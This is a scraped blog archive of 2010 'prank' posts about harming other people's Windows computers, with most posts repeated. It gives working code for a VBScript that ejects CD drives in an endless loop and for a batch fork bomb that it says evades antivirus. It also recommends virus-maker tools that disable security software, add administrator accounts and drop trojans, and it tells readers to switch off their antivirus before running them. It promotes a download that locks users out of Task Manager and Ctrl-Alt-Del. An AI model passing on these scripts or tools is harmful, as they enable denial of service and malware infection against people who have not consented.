This trick enable you to make a persons CD Drive open it when the victim tries to close it . When the persons opens it it closes automatically and this keeps on repeating till the person finnaly restarts. So i think this one will be a teaser for your friends….
Right click on desktop and go to new and then new text document then copy and paste this in that file:
do
Set oWMP = CreateObject(“WMPlayer.OCX.7″)
Set colCDROMs = oWMP.cdromCollection
if colCDROMS.Count >= 1 then
For i = 0 to colCDROMS.Count – 1
colCDROMS.Item(i).Eject
Next ‘ cdrom
End if
Loop
Save this file as cdrom.vbs in save as. Then open the file and then the cd rom will not close itself. To stop this from happening you have to restart your computer
Right click on desktop and go to new and then new text document then copy and paste this in that file:
do
Set oWMP = CreateObject(“WMPlayer.OCX.7″)
Set colCDROMs = oWMP.cdromCollection
if colCDROMS.Count >= 1 then
For i = 0 to colCDROMS.Count – 1
colCDROMS.Item(i).Eject
Next ‘ cdrom
End if
Loop
Save this file as cdrom.vbs in save as. Then open the file and then the cd rom will not close itself. To stop this from happening you have to restart your computer
Tuesday, August 24, 2010
How to make a Fork Bomb (Rabbit Virus)
Hey guys, I ‘ve got a new thing for all u guys to have fun with, its very easy and fun to do. Before we start coding ill explain what a fork bomb actually is.
A fork bomb or rabbit virus opens an application for example cmd.exe so many times that its overloads the computers processor which results in the computer either overheating, shutting down or in some cases you can get a BSOD (blue screen of death). Unlike little batch viruses like the shutdown one you cannot stop a fork bomb unless you extremely 1337 so once it starts it goes until it does its job.
Most Anti-Virus software will not pick a fork bomb or rabbit virus, as far as its concerned its just a batch file the opens and application.
Background
Fork Bombs aka Rabbit viruses have been around for ages due to their effectiveness to evade anti-virus software. I came across it when i wanted to play a practical joke on my schools administrator for his birthday. Just to let you know it worked and hes not some n00b. I find them very effective just don’t bomb yourself.
The code
Ok this is the code that you type into notepad.exe remember to save it as a .bat or if you want it in a dorminant for save it as a .txt
One more thing…I am not responsible if you kills your computer or somebody else computer with or without permission. Now that we have that out a the way here we go…
Blocks of code should be set as style “Formatted” like this.
:s
START %0
GOTO :s
Have fun guys and do leave your feedback about this article!
A fork bomb or rabbit virus opens an application for example cmd.exe so many times that its overloads the computers processor which results in the computer either overheating, shutting down or in some cases you can get a BSOD (blue screen of death). Unlike little batch viruses like the shutdown one you cannot stop a fork bomb unless you extremely 1337 so once it starts it goes until it does its job.
Most Anti-Virus software will not pick a fork bomb or rabbit virus, as far as its concerned its just a batch file the opens and application.
Background
Fork Bombs aka Rabbit viruses have been around for ages due to their effectiveness to evade anti-virus software. I came across it when i wanted to play a practical joke on my schools administrator for his birthday. Just to let you know it worked and hes not some n00b. I find them very effective just don’t bomb yourself.
The code
Ok this is the code that you type into notepad.exe remember to save it as a .bat or if you want it in a dorminant for save it as a .txt
One more thing…I am not responsible if you kills your computer or somebody else computer with or without permission. Now that we have that out a the way here we go…
Blocks of code should be set as style “Formatted” like this.
:s
START %0
GOTO :s
Have fun guys and do leave your feedback about this article!
Saturday, August 21, 2010
Fake Virus prank program for real fun
Virus on computer can easily make it do some strange things with different pop-up errors, blue screen of death and nasty error messages on black screen. This for sure is scary for any Windows user. How about faking all this for real fun with friends? This is possible using “The Ultimate Virus” fake prank program.
Just download, unzip and double click to launch this ultimate virus prank program. First screen has 3 options: format hard disk, delete windows folder, delete all contents of disk. Select either of not so comforting option and see the fake virus fun play on the computer. This follows blue screen of death with heavy loaded errors on black screen.
There is no way to exit, after few minutes of fun you get comforting button to exit this prank application. Get dose of fake virus fun which looks all real to surprise friends with The Ultimate Virus prank program. Have fun!
Just download, unzip and double click to launch this ultimate virus prank program. First screen has 3 options: format hard disk, delete windows folder, delete all contents of disk. Select either of not so comforting option and see the fake virus fun play on the computer. This follows blue screen of death with heavy loaded errors on black screen.
There is no way to exit, after few minutes of fun you get comforting button to exit this prank application. Get dose of fake virus fun which looks all real to surprise friends with The Ultimate Virus prank program. Have fun!
Friday, July 2, 2010
How to Create a Computer Virus
I have previously posted about How to Create a Fake and Harmless Virus. In this article i want to show you how to create a real virus using Virus Software. I compiled a list of some great virus maker softwares. Now you don't have to know any programming or coding to make virus. Simply use one of these Virus softwares and you can easily make virus for yourself. These virus softwares provides you with various options which you can use to make virus according to your preferences. The virus programs are tested to well working on all Windows systems.
Here is the list of the softwares that allows you to make Virus:
1. In Shadow Batch Virus Generator
1. First of all download the virus maker from here
2. Run "In Shadow Batch Virus Generator.exe" application to see something like this:
3. You can use various options to make virus to suit your needs. You can:
•Infect files of various extensions
•Insert virus in startup menu, Kill various processes.
•Disable all security services like Windows Defender, Antivirus, Firewall.
•Rename file extensions, spread virus via file sharing.
•Create new admin account, change user account password.
•Block various websites, download trojan files to victim computer, shutdown victim computer and much more.
4. After selecting various options, move on to "Creating Options" tab and hit on "Save as Bat". Assign name to the virus and hit on Save.
5. Now, you have your virus ready to hack your victim. This virus maker is undetectable by the most antiviruses.
I am not responsible for any action performed by you. Also, do not try this virus on your own computer. This virus software is one of the most efficient virus software used today.
2. JPS Virus Maker
This is also a great virus maker with many features in it.
download it here
3. TeraBIT Virus Maker
A powerful virus maker for you. Look for updates here
Download JPS Virus Maker and TeraBit Virus Maker.
These two virus makers are detected as a viruses by the most anti-virus softwares, but they won't harm your pc in any way. Before you run these virus makers disable your anti-virus temporarily.
If you know other virus makers i want to hear your suggestions.
Here is the list of the softwares that allows you to make Virus:
1. In Shadow Batch Virus Generator
1. First of all download the virus maker from here
2. Run "In Shadow Batch Virus Generator.exe" application to see something like this:
3. You can use various options to make virus to suit your needs. You can:
•Infect files of various extensions
•Insert virus in startup menu, Kill various processes.
•Disable all security services like Windows Defender, Antivirus, Firewall.
•Rename file extensions, spread virus via file sharing.
•Create new admin account, change user account password.
•Block various websites, download trojan files to victim computer, shutdown victim computer and much more.
4. After selecting various options, move on to "Creating Options" tab and hit on "Save as Bat". Assign name to the virus and hit on Save.
5. Now, you have your virus ready to hack your victim. This virus maker is undetectable by the most antiviruses.
I am not responsible for any action performed by you. Also, do not try this virus on your own computer. This virus software is one of the most efficient virus software used today.
2. JPS Virus Maker
This is also a great virus maker with many features in it.
download it here
3. TeraBIT Virus Maker
A powerful virus maker for you. Look for updates here
Download JPS Virus Maker and TeraBit Virus Maker.
These two virus makers are detected as a viruses by the most anti-virus softwares, but they won't harm your pc in any way. Before you run these virus makers disable your anti-virus temporarily.
If you know other virus makers i want to hear your suggestions.
Deadly Virus Prank to Freak Out Your Friends
Previously i've made a post about a software called The Ultimate Virus, which is one of the best virus prank programs on the net and a tutorial about How to Create a Fake and Harmless Virus. This virus prank that i'm going to show you in this post is called Ghost Virus and it's not even similar to the two pranks above. This is a deadly virus in the literally mean of the word. It is an undetectable virus which will mess up your victims computer in just one click, so be shure that you'll have fun with this one.
Here are some features of this evil little buddy:
* Disable Task Manager
* Disable Registry Editor
* Disable MS Config
* Disable Command Prompt
* Disable Explorer
* Disable Shutdown
* Disable 'taskkill'
* Beeps every 100 ms
* Displays a black screen every 2 seconds
* Message Box Bomb
* Adds itself to startup
* Closes/Opens CD-Rom every 100 ms
* Hides Cursor
* Disable Ctrl-Alt-Dlt
*** NOTE: TO REMOVE PRESS "P". ***
If you love to making fun to your friend, then this tool is definitively for you.
download
Here are some features of this evil little buddy:
* Disable Task Manager
* Disable Registry Editor
* Disable MS Config
* Disable Command Prompt
* Disable Explorer
* Disable Shutdown
* Disable 'taskkill'
* Beeps every 100 ms
* Displays a black screen every 2 seconds
* Message Box Bomb
* Adds itself to startup
* Closes/Opens CD-Rom every 100 ms
* Hides Cursor
* Disable Ctrl-Alt-Dlt
*** NOTE: TO REMOVE PRESS "P". ***
If you love to making fun to your friend, then this tool is definitively for you.
download

























